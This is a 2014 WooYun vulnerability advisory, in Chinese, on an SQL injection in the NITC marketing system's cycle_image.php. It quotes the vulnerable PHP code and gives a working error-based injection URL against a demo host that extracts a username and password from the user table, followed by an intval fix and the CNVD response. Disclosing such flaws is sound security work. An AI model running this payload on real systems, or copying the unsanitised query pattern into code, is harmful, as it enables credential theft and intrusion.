当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067113

漏洞标题:NITC营销系统SQL注入漏洞

相关厂商:NITC营销系统

漏洞作者: HackBraid

提交时间:2014-07-03 10:50

修复时间:2014-10-01 10:52

公开时间:2014-10-01 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-08: 厂商已经确认,细节仅向厂商公开
2014-07-11: 细节向第三方安全合作伙伴开放
2014-09-01: 细节向核心白帽子及相关领域专家公开
2014-09-11: 细节向普通白帽子公开
2014-09-21: 细节向实习白帽子公开
2014-10-01: 细节向公众公开

简要描述:

RT

详细说明:

注入出现在cycle_image.php

<?php
define( "IN_LOCK", true );
define( "INIT_NO_USERS", true );
define( "INIT_NO_SMARTY", true );
require( "./includes/init.php" );
header( "Content-type: text/xml; charset=utf-8" );
header( "Expires: Fri, 14 Mar 1980 20:53:00 GMT" );
header( "Last-Modified: ".gmdate( "D, d M Y H:i:s" )." GMT" );
header( "Pragma: no-cache" );
$s = explode( "^", trim( $_GET['language'] ) );//用^分隔得到数组$s
echo "<?xml version=\"1.0\" encoding=\"utf-8\"?><bcaster>";
$sql = "select * from ".$site->table( "ad" )." where language_id=".$s[0]." and category='".$s[1]."' and type=0 and state=0 order by sort_order desc";//$s[0]没加单引号,无视gpc注入
$res = $db->getAllCached( $sql );
foreach ( $res as $row )
{
    if ( is_file( "upload/adfile/".$row['file'] ) )
    {
        echo "<item item_url=\"".$_CFG['weburl']."/upload/adfile/".$row['file']."\" link=\"".$row['url']."\" />";
    }
}
echo "</bcaster>";
?>


官网测试:
http://demo.cnnitc.com/cycle_image.php?language=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(floor(rand(0)*2),(select%20concat(user_name,0x23,password)%20from%20nitc_user%20limit%200,1))x%20FROM%20INFORMATION_SCHEMA.tables%20GROUP%20BY%20x)a)#

漏洞证明:

n.jpg

修复方案:

language接收的是个数组,对每个值遍历进行:
$language=intval($_GET['language']);

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-07-08 10:31

厂商回复:

CNVD确认所述情况,暂未涉及重要部门用户,已经由CNVD直接联系软件生产厂商,通过简要通报邮件,发官方service邮箱以及whois信息邮箱中处置。

最新状态:

暂无